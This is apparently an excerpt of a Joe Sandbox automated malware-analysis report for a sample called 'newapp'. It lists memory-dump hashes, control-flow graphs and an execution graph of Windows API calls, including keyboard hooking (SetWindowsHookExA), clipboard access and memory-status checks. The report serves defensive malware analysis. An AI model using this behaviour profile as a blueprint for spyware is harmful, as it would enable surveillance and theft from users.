                                                                                                            • Instruction ID: ecf6faf5a8ac4b19c9fcc50f79d3e8ea7bb74a1efd31bacd9dc3eb0b7053982b
                                                                                                            • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                            • Instruction Fuzzy Hash: B011D376504380CFCB16CF10D9C4B16BF72FBA4318F28C5A9D9094B656C336D86ACBA2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1943269739.0000000000D3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D3D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_d3d000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                            • Instruction ID: 48e9ea82db0ec22ec01479de0a851d97431f534ac25e63a7a7d3569866c0af2d
                                                                                                            • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                            • Instruction Fuzzy Hash: D9118B79504280DFDB16CF14D5C4B16BBA2FB84314F28C6AAD8494B696C33AD85ACF61

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:11%
                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                            Signature Coverage:0%
                                                                                                            Total number of Nodes:151
                                                                                                            Total number of Limit Nodes:19
                                                                                                            execution_graph 36428 6f0a4f0 DuplicateHandle 36429 6f0a586 36428->36429 36585 6f0c0e0 36586 6f0c13a OleGetClipboard 36585->36586 36587 6f0c17a 36586->36587 36430 6f06758 36431 6f067c0 CreateWindowExW 36430->36431 36433 6f0687c 36431->36433 36588 6f0a2a8 36589 6f0a2a9 GetCurrentProcess 36588->36589 36591 6f0a340 GetCurrentThread 36589->36591 36592 6f0a339 36589->36592 36593 6f0a376 36591->36593 36594 6f0a37d GetCurrentProcess 36591->36594 36592->36591 36593->36594 36595 6f0a3b3 36594->36595 36596 6f0a3db GetCurrentThreadId 36595->36596 36597 6f0a40c 36596->36597 36598 6f0dea8 36599 6f0deec SetWindowsHookExA 36598->36599 36601 6f0df32 36599->36601 36602 6f0bf48 36603 6f0bf53 36602->36603 36605 6f0bf63 36603->36605 36606 6f0b4ec 36603->36606 36607 6f0bf98 OleInitialize 36606->36607 36608 6f0bffc 36607->36608 36608->36605 36434 1810848 36436 181084e 36434->36436 36435 181091b 36436->36435 36438 1811340 36436->36438 36439 18112d8 36438->36439 36442 181134f 36438->36442 36439->36436 36440 1811454 36440->36436 36442->36440 36444 18180f9 36442->36444 36449 6f03ac8 36442->36449 36445 1818103 36444->36445 36446 18181b9 36445->36446 36455 6f1fa59 36445->36455 36459 6f1fa60 36445->36459 36446->36442 36450 6f03ada 36449->36450 36454 6f03b8b 36450->36454 36463 6f03824 36450->36463 36452 6f03b51 36468 6f03844 36452->36468 36454->36442 36457 6f1fa60 36455->36457 36456 6f1fc8a 36456->36446 36457->36456 36458 6f1fca9 GlobalMemoryStatusEx GlobalMemoryStatusEx 36457->36458 36458->36457 36460 6f1fa75 36459->36460 36461 6f1fc8a 36460->36461 36462 6f1fca9 GlobalMemoryStatusEx GlobalMemoryStatusEx 36460->36462 36461->36446 36462->36460 36464 6f0382f 36463->36464 36472 6f04c80 36464->36472 36478 6f04c6b 36464->36478 36465 6f03d2a 36465->36452 36469 6f0384f 36468->36469 36471 6f0babb 36469->36471 36519 6f0b2b4 36469->36519 36471->36454 36473 6f04cab 36472->36473 36484 6f051f0 36473->36484 36474 6f04d2e 36475 6f03ffc GetModuleHandleW 36474->36475 36476 6f04d5a 36474->36476 36475->36476 36479 6f04c80 36478->36479 36483 6f051f0 3 API calls 36479->36483 36480 6f04d2e 36481 6f03ffc GetModuleHandleW 36480->36481 36482 6f04d5a 36480->36482 36481->36482 36483->36480 36485 6f0522d 36484->36485 36486 6f052ae 36485->36486 36489 6f05370 36485->36489 36502 6f0536a 36485->36502 36490 6f05385 36489->36490 36492 6f053a9 36490->36492 36515 6f03ffc 36490->36515 36493 6f03ffc GetModuleHandleW 36492->36493 36501 6f05574 36492->36501 36494 6f054fa 36493->36494 36495 6f055cf 36494->36495 36498 6f03ffc GetModuleHandleW 36494->36498 36494->36501 36495->36486 36496 6f056f9 GetModuleHandleW 36497 6f05725 36496->36497 36497->36486 36499 6f05548 36498->36499 36500 6f03ffc GetModuleHandleW 36499->36500 36499->36501 36500->36501 36501->36495 36501->36496 36503 6f05370 36502->36503 36504 6f03ffc GetModuleHandleW 36503->36504 36506 6f053a9 36503->36506 36504->36506 36505 6f05574 36509 6f055cf 36505->36509 36510 6f056f9 GetModuleHandleW 36505->36510 36506->36505 36507 6f03ffc GetModuleHandleW 36506->36507 36508 6f054fa 36507->36508 36508->36505 36508->36509 36512 6f03ffc GetModuleHandleW 36508->36512 36509->36486 36511 6f05725 36510->36511 36511->36486 36513 6f05548 36512->36513 36513->36505 36514 6f03ffc GetModuleHandleW 36513->36514 36514->36505 36516 6f056b0 GetModuleHandleW 36515->36516 36518 6f05725 36516->36518 36518->36492 36520 6f0bad0 KiUserCallbackDispatcher 36519->36520 36522 6f0bb3e 36520->36522 36522->36469 36523 15dd030 36524 15dd048 36523->36524 36525 15dd0a2 36524->36525 36532 6f0b0d3 36524->36532 36541 6f06a30 36524->36541 36545 6f06910 36524->36545 36551 6f0690a 36524->36551 36557 6f04134 36524->36557 36565 6f04124 36524->36565 36533 6f0b0da 36532->36533 36534 6f0b0ea 36532->36534 36533->36525 36535 6f0b161 36534->36535 36537 6f0b151 36534->36537 36577 6f0a274 36535->36577 36569 6f0b690 36537->36569 36573 6f0b650 36537->36573 36538 6f0b15f 36542 6f06a40 36541->36542 36581 6f0415c 36542->36581 36544 6f06a47 36544->36525 36550 6f06936 36545->36550 36546 6f04124 GetModuleHandleW 36547 6f06942 36546->36547 36548 6f04134 CallWindowProcW 36547->36548 36549 6f06957 36548->36549 36549->36525 36550->36546 36552 6f06936 36551->36552 36553 6f04124 GetModuleHandleW 36552->36553 36554 6f06942 36553->36554 36555 6f04134 CallWindowProcW 36554->36555 36556 6f06957 36555->36556 36556->36525 36558 6f0413f 36557->36558 36559 6f0b161 36558->36559 36562 6f0b151 36558->36562 36560 6f0a274 CallWindowProcW 36559->36560 36561 6f0b15f 36560->36561 36563 6f0b690 CallWindowProcW 36562->36563 36564 6f0b650 CallWindowProcW 36562->36564 36563->36561 36564->36561 36566 6f0412f 36565->36566 36567 6f0415c GetModuleHandleW 36566->36567 36568 6f06a47 36567->36568 36568->36525 36572 6f0b69e 36569->36572 36570 6f0a274 CallWindowProcW 36570->36572 36571 6f0b77a 36571->36538 36572->36570 36572->36571 36574 6f0b655 36573->36574 36575 6f0a274 CallWindowProcW 36574->36575 36576 6f0b77a 36574->36576 36575->36574 36576->36538 36578 6f0a27f 36577->36578 36579 6f0b82a CallWindowProcW 36578->36579 36580 6f0b7d9 36578->36580 36579->36580 36580->36538 36582 6f04167 36581->36582 36583 6f03ffc GetModuleHandleW 36582->36583 36584 6f06b17 36582->36584 36583->36584

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 124 6f13570-6f13591 125 6f13593-6f13596 124->125 126 6f13598-6f135b7 125->126 127 6f135bc-6f135bf 125->127 126->127 128 6f13d60-6f13d62 127->128 129 6f135c5-6f135e4 127->129 130 6f13d64 128->130 131 6f13d69-6f13d6c 128->131 137 6f135e6-6f135e9 129->137 138 6f135fd-6f13607 129->138 130->131 131->125 134 6f13d72-6f13d7b 131->134 137->138 139 6f135eb-6f135fb 137->139 142 6f1360d-6f1361e call 6f1315c 138->142 139->142 144 6f13623-6f13628 142->144 145 6f13635-6f13912 144->145 146 6f1362a-6f13630 144->146 167 6f13d52-6f13d5f 145->167 168 6f13918-6f139c7 145->168 146->134 177 6f139f0 168->177 178 6f139c9-6f139ee 168->178 180 6f139f9-6f13a0c call 6f13168 177->180 178->180 183 6f13a12-6f13a34 call 6f13174 180->183 184 6f13d39-6f13d45 180->184 183->184 188 6f13a3a-6f13a44 183->188 184->168 185 6f13d4b 184->185 185->167 188->184 189 6f13a4a-6f13a55 188->189 189->184 190 6f13a5b-6f13b31 189->190 202 6f13b33-6f13b35 190->202 203 6f13b3f-6f13b6f 190->203 202->203 207 6f13b71-6f13b73 203->207 208 6f13b7d-6f13b89 203->208 207->208 209 6f13be9-6f13bed 208->209 210 6f13b8b-6f13b8f 208->210 211 6f13bf3-6f13c2f 209->211 212 6f13d2a-6f13d33 209->212 210->209 213 6f13b91-6f13bbb 210->213 224 6f13c31-6f13c33 211->224 225 6f13c3d-6f13c4b 211->225 212->184 212->190 220 6f13bc9-6f13be6 call 6f13180 213->220 221 6f13bbd-6f13bbf 213->221 220->209 221->220 224->225 228 6f13c62-6f13c6d 225->228 229 6f13c4d-6f13c58 225->229 233 6f13c85-6f13c96 228->233 234 6f13c6f-6f13c75 228->234 229->228 232 6f13c5a 229->232 232->228 238 6f13c98-6f13c9e 233->238 239 6f13cae-6f13cba 233->239 235 6f13c77 234->235 236 6f13c79-6f13c7b 234->236 235->233 236->233 240 6f13ca0 238->240 241 6f13ca2-6f13ca4 238->241 243 6f13cd2-6f13d23 239->243 244 6f13cbc-6f13cc2 239->244 240->239 241->239 243->212 245 6f13cc4 244->245 246 6f13cc6-6f13cc8 244->246 245->243 246->243
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.2017670171.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_6f10000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                                                            • API String ID: 0-2392861976
                                                                                                            • Opcode ID: f3ded0f63a241c37118f08907bfb522bbdeb2948bd8f1b71837ba1f1a18c91c6
                                                                                                            • Instruction ID: 29b4d718b30cc4ea61ae6543c6de63faa2777d4af101a886e0212657c47abf8b
                                                                                                            • Opcode Fuzzy Hash: f3ded0f63a241c37118f08907bfb522bbdeb2948bd8f1b71837ba1f1a18c91c6
                                                                                                            • Instruction Fuzzy Hash: 7E321E31E1061A8FCB54DF79D85469DB7B6FF89300F10D6AAD409AB264EF30AD85CB81
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.2017670171.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_6f10000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 84664db4be574377b067ed890dca858a4722606b15902f08bfb3992adc0becf9
                                                                                                            • Instruction ID: 638fd8802a1eb15ea62b30666ac59dd7e4d0c3b7fdd51fcab6c7615094450632
                                                                                                            • Opcode Fuzzy Hash: 84664db4be574377b067ed890dca858a4722606b15902f08bfb3992adc0becf9
                                                                                                            • Instruction Fuzzy Hash: 76224C30E00109CFDF64CB68D4947AEB7A6EB89350F24882AE405EF395DA35DC86CB91
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.2017670171.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_6f10000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b24c7c35e53d2530dece2f0b279044887fc7178ede61b35d0a7014dbb6d89f03
                                                                                                            • Instruction ID: 2c53498700d38a08d9ae1446ecd1a7e41fda47ed088270219804809110a5a9ba
                                                                                                            • Opcode Fuzzy Hash: b24c7c35e53d2530dece2f0b279044887fc7178ede61b35d0a7014dbb6d89f03
                                                                                                            • Instruction Fuzzy Hash: B891C1F5E182198FDF608B68C49076EFBA2FB853B0F558466E8A9DF285C235DC40C791

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 0 6f1adb0-6f1adce 1 6f1add0-6f1add3 0->1 2 6f1add5-6f1adf1 1->2 3 6f1adf6-6f1adf9 1->3 2->3 4 6f1adfb-6f1adff 3->4 5 6f1ae0a-6f1ae0d 3->5 7 6f1ae05 4->7 8 6f1afdc-6f1afe6 4->8 9 6f1ae1d-6f1ae20 5->9 10 6f1ae0f-6f1ae18 5->10 7->5 11 6f1ae26-6f1ae29 9->11 12 6f1afcd-6f1afd6 9->12 10->9 14 6f1ae2b-6f1ae38 11->14 15 6f1ae3d-6f1ae40 11->15 12->8 16 6f1ae6c-6f1ae75 12->16 14->15 17 6f1ae42-6f1ae55 15->17 18 6f1ae5a-6f1ae5d 15->18 19 6f1afe7-6f1b01e 16->19 20 6f1ae7b-6f1ae7f 16->20 17->18 22 6f1ae67-6f1ae6a 18->22 23 6f1ae5f-6f1ae64 18->23 29 6f1b020-6f1b023 19->29 24 6f1ae84-6f1ae86 20->24 22->16 22->24 23->22 27 6f1ae88 24->27 28 6f1ae8d-6f1ae90 24->28 27->28 28->1 30 6f1ae96-6f1aeba 28->30 31 6f1b032-6f1b035 29->31 32 6f1b025 call 6f1b307 29->32 45 6f1aec0-6f1aecf 30->45 46 6f1afca 30->46 34 6f1b03b-6f1b076 31->34 35 6f1b29e-6f1b2a1 31->35 38 6f1b02b-6f1b02d 32->38 43 6f1b269-6f1b27c 34->43 44 6f1b07c-6f1b088 34->44 36 6f1b2a3-6f1b2ad 35->36 37 6f1b2ae-6f1b2b1 35->37 41 6f1b2b3-6f1b2cf 37->41 42 6f1b2d4-6f1b2d7 37->42 38->31 41->42 47 6f1b2d9-6f1b2dd 42->47 48 6f1b2e8-6f1b2ea 42->48 52 6f1b27e 43->52 57 6f1b0a8-6f1b0ec 44->57 58 6f1b08a-6f1b0a3 44->58 59 6f1aed1-6f1aed7 45->59 60 6f1aee7-6f1af22 call 6f16690 45->60 46->12 47->34 49 6f1b2e3 47->49 50 6f1b2f1-6f1b2f4 48->50 51 6f1b2ec 48->51 49->48 50->29 55 6f1b2fa-6f1b304 50->55 51->50 52->35 75 6f1b108-6f1b147 57->75 76 6f1b0ee-6f1b100 57->76 58->52 62 6f1aed9 59->62 63 6f1aedb-6f1aedd 59->63 77 6f1af24-6f1af2a 60->77 78 6f1af3a-6f1af51 60->78 62->60 63->60 84 6f1b14d-6f1b228 call 6f16690 75->84 85 6f1b22e-6f1b243 75->85 76->75 79 6f1af2c 77->79 80 6f1af2e-6f1af30 77->80 90 6f1af53-6f1af59 78->90 91 6f1af69-6f1af7a 78->91 79->78 80->78 84->85 85->43 93 6f1af5b 90->93 94 6f1af5d-6f1af5f 90->94 97 6f1af92-6f1afc3 91->97 98 6f1af7c-6f1af82 91->98 93->91 94->91 97->46 99 6f1af84 98->99 100 6f1af86-6f1af88 98->100 99->97 100->97
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.2017670171.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_6f10000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                            • API String ID: 0-3823777903
                                                                                                            • Opcode ID: 964cc743ead0305d4acf50f9bc1843160401649bd383ac1d3b5d7f5d4783312e
                                                                                                            • Instruction ID: 756b7ea823d2d7ddbcfe60f524336f76194ae95bbc8baf57b5c87ad9034b1c6c
                                                                                                            • Opcode Fuzzy Hash: 964cc743ead0305d4acf50f9bc1843160401649bd383ac1d3b5d7f5d4783312e
                                                                                                            • Instruction Fuzzy Hash: F6E18A31F0020A8FCB65DFA9D8846AEB7A2FF85340F208529D419AF354DB75DD4ACB81

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 254 6f0a247-6f0a249 255 6f0a24b-6f0a273 254->255 256 6f0a2ae-6f0a337 GetCurrentProcess 254->256 255->256 262 6f0a340-6f0a374 GetCurrentThread 256->262 263 6f0a339-6f0a33f 256->263 264 6f0a376-6f0a37c 262->264 265 6f0a37d-6f0a3b1 GetCurrentProcess 262->265 263->262 264->265 267 6f0a3b3-6f0a3b9 265->267 268 6f0a3ba-6f0a3d5 call 6f0a478 265->268 267->268 271 6f0a3db-6f0a40a GetCurrentThreadId 268->271 272 6f0a413-6f0a475 271->272 273 6f0a40c-6f0a412 271->273 273->272
                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 06F0A326
                                                                                                            • GetCurrentThread.KERNEL32 ref: 06F0A363
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 06F0A3A0
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 06F0A3F9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.2017600015.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_6f00000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Current$ProcessThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 2063062207-0
                                                                                                            • Opcode ID: b43b7c3db467595f7c06677e0554c7e6310baf71de29a2728cbce86726f8a22e
                                                                                                            • Instruction ID: 3731d97dee429cad4d1eab0990234ba558b273d3fc355f439433c5502539e93a
                                                                                                            • Opcode Fuzzy Hash: b43b7c3db467595f7c06677e0554c7e6310baf71de29a2728cbce86726f8a22e
                                                                                                            • Instruction Fuzzy Hash: 1F5188B09013498FEB54DFAAD9487DEBFF1FF88304F24805AD049A72A1D735A984CB65

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 280 6f0a299-6f0a2a0 281 6f0a2a2-6f0a2a8 280->281 282 6f0a2a9-6f0a337 GetCurrentProcess 280->282 281->282 288 6f0a340-6f0a374 GetCurrentThread 282->288 289 6f0a339-6f0a33f 282->289 290 6f0a376-6f0a37c 288->290 291 6f0a37d-6f0a3b1 GetCurrentProcess 288->291 289->288 290->291 293 6f0a3b3-6f0a3b9 291->293 294 6f0a3ba-6f0a3d5 call 6f0a478 291->294 293->294 297 6f0a3db-6f0a40a GetCurrentThreadId 294->297 298 6f0a413-6f0a475 297->298 299 6f0a40c-6f0a412 297->299 299->298
                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 06F0A326
                                                                                                            • GetCurrentThread.KERNEL32 ref: 06F0A363
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 06F0A3A0
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 06F0A3F9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.2017600015.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_6f00000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Current$ProcessThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 2063062207-0
                                                                                                            • Opcode ID: d75568205f0b93e7b321265a05d9748d70dc7530925cbe079e085133d98e168e
                                                                                                            • Instruction ID: 160486ccef42d69ba70c14821fc087776a2500bdb4d0b29cad8d32d24e4895a6
                                                                                                            • Opcode Fuzzy Hash: d75568205f0b93e7b321265a05d9748d70dc7530925cbe079e085133d98e168e
                                                                                                            • Instruction Fuzzy Hash: 575167B09003499FDB54CFAAD948B9EBFF1BF88304F20805AD109A72A1D735A984CF65

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 306 6f0a2a8-6f0a337 GetCurrentProcess 312 6f0a340-6f0a374 GetCurrentThread 306->312 313 6f0a339-6f0a33f 306->313 314 6f0a376-6f0a37c 312->314 315 6f0a37d-6f0a3b1 GetCurrentProcess 312->315 313->312 314->315 317 6f0a3b3-6f0a3b9 315->317 318 6f0a3ba-6f0a3d5 call 6f0a478 315->318 317->318 321 6f0a3db-6f0a40a GetCurrentThreadId 318->321 322 6f0a413-6f0a475 321->322 323 6f0a40c-6f0a412 321->323 323->322
                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 06F0A326
                                                                                                            • GetCurrentThread.KERNEL32 ref: 06F0A363
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 06F0A3A0
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 06F0A3F9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.2017600015.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_6f00000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Current$ProcessThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 2063062207-0
                                                                                                            • Opcode ID: dd2ac03f654d5af76f5d771ecddd4992938bcf7fc89333c1cfbcb7712cb6113b
                                                                                                            • Instruction ID: 4a78c727d44c802aac5808ad234252c3582a823b30ffec41d7b0884d34cf6fff
                                                                                                            • Opcode Fuzzy Hash: dd2ac03f654d5af76f5d771ecddd4992938bcf7fc89333c1cfbcb7712cb6113b
                                                                                                            • Instruction Fuzzy Hash: F85154B09003098FDB54CFAAD948B9EBBF1BF88304F20C459D119A72A0DB35A984CF65

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 330 6f19238-6f1925d 331 6f1925f-6f19262 330->331 332 6f19b20-6f19b23 331->332 333 6f19268-6f1927d 331->333 334 6f19b25-6f19b44 332->334 335 6f19b49-6f19b4b 332->335 340 6f19295-6f192ab 333->340 341 6f1927f-6f19285 333->341 334->335 336 6f19b52-6f19b55 335->336 337 6f19b4d 335->337 336->331 339 6f19b5b-6f19b65 336->339 337->336 347 6f192b6-6f192b8 340->347 343 6f19287 341->343 344 6f19289-6f1928b 341->344 343->340 344->340 348 6f192d0-6f19341 347->348 349 6f192ba-6f192c0 347->349 360 6f19343-6f19366 348->360 361 6f1936d-6f19389 348->361 350 6f192c2 349->350 351 6f192c4-6f192c6 349->351 350->348 351->348 360->361 366 6f193b5-6f193d0 361->366 367 6f1938b-6f193ae 361->367 372 6f193d2-6f193f4 366->372 373 6f193fb-6f19416 366->373 367->366 372->373 378 6f19418-6f19434 373->378 379 6f1943b-6f19449 373->379 378->379 380 6f19459-6f194d3 379->380 381 6f1944b-6f19454 379->381 387 6f19520-6f19535 380->387 388 6f194d5-6f194f3 380->388 381->339 387->332 392 6f194f5-6f19504 388->392 393 6f1950f-6f1951e 388->393 392->393 393->387 393->388
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.2017670171.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_6f10000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q$$^q$$^q
                                                                                                            • API String ID: 0-2125118731
                                                                                                            • Opcode ID: 0447e72ce26787fb1f1375b66526d558e3d55fba7a3a515c311b70bf6b9bc59a
                                                                                                            • Instruction ID: 9f566c1d8a200b6a21cad9b4b608a213ea3be983d8da532282bc34ce97bd1ff4
                                                                                                            • Opcode Fuzzy Hash: 0447e72ce26787fb1f1375b66526d558e3d55fba7a3a515c311b70bf6b9bc59a
                                                                                                            • Instruction Fuzzy Hash: 24915D30F0021A9FDB54DF79E8607AEB7F6FBC9640F108469C409EB384EA749D468B91

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 396 6f14c78-6f14c9c 397 6f14c9e-6f14ca1 396->397 398 6f14ca3-6f14cbd 397->398 399 6f14cc2-6f14cc5 397->399 398->399 400 6f153a4-6f153a6 399->400 401 6f14ccb-6f14dc3 399->401 403 6f153a8 400->403 404 6f153ad-6f153b0 400->404 419 6f14e46-6f14e4d 401->419 420 6f14dc9-6f14e16 call 6f1552f 401->420 403->404 404->397 406 6f153b6-6f153c3 404->406 421 6f14ed1-6f14eda 419->421 422 6f14e53-6f14ec3 419->422 433 6f14e1c-6f14e38 420->433 421->406 439 6f14ec5 422->439 440 6f14ece 422->440 437 6f14e43-6f14e44 433->437 438 6f14e3a 433->438 437->419 438->437 439->440 440->421
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.2017670171.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_6f10000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: fcq$XPcq$\Ocq
                                                                                                            • API String ID: 0-3575482020
                                                                                                            • Opcode ID: 000fe0546618441bff6bb0e48025b356e1560d00b4b947af0c78aa42c774f87c
                                                                                                            • Instruction ID: dc1e8890b6c65b8b1f7585001b41b086a65d86764e6598c5b2c052796bdd02bb
                                                                                                            • Opcode Fuzzy Hash: 000fe0546618441bff6bb0e48025b356e1560d00b4b947af0c78aa42c774f87c
                                                                                                            • Instruction Fuzzy Hash: 7E617A31F002199FEB54DFA9D8547AEBAF2FBC8740F208429D10AEF394DA758D458B91

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 543 6f18160-6f1817f 544 6f18181-6f18184 543->544 545 6f181a7-6f181aa 544->545 546 6f18186-6f181a2 544->546 547 6f181b0-6f181bc 545->547 548 6f18257-6f1825a 545->548 546->545 554 6f181c7-6f181c9 547->554 549 6f18260-6f1826f 548->549 550 6f1848f-6f18491 548->550 562 6f18271-6f1828c 549->562 563 6f1828e-6f182d2 549->563 552 6f18493 550->552 553 6f18498-6f1849b 550->553 552->553 553->544 557 6f184a1-6f184aa 553->557 558 6f181e1-6f181e5 554->558 559 6f181cb-6f181d1 554->559 560 6f181f3 558->560 561 6f181e7-6f181f1 558->561 564 6f181d3 559->564 565 6f181d5-6f181d7 559->565 566 6f181f8-6f181fa 560->566 561->566 562->563 571 6f18463-6f18479 563->571 572 6f182d8-6f182e9 563->572 564->558 565->558 567 6f18211-6f1824a 566->567 568 6f181fc-6f181ff 566->568 567->549 587 6f1824c-6f18256 567->587 568->557 571->550 579 6f182ef-6f1830c 572->579 580 6f1844e-6f1845d 572->580 579->580 586 6f18312-6f18408 call 6f16690 579->586 580->571 580->572 611 6f18416 586->611 612 6f1840a-6f18414 586->612 613 6f1841b-6f1841d 611->613 612->613 613->580 614 6f1841f-6f18424 613->614 615 6f18432 614->615 616 6f18426-6f18430 614->616 617 6f18437-6f18439 615->617 616->617 617->580 618 6f1843b-6f18447 617->618 618->580
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.2017670171.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_6f10000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q
                                                                                                            • API String ID: 0-355816377
                                                                                                            • Opcode ID: 5f0ff3cd24ca1826a5197561e37c5a2d6465bb0fe9933dcfdfadf20a5666fca3
                                                                                                            • Instruction ID: 103c33dbcd3c8d93ef4317d3bbb9f53fcc80a86ede0fb5199c319ab4230df43f
                                                                                                            • Opcode Fuzzy Hash: 5f0ff3cd24ca1826a5197561e37c5a2d6465bb0fe9933dcfdfadf20a5666fca3
                                                                                                            • Instruction Fuzzy Hash: EF918A31F002068FDB54DB79EA5466EB7A6FF84384F148429D816EB394EF34EC468B91

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
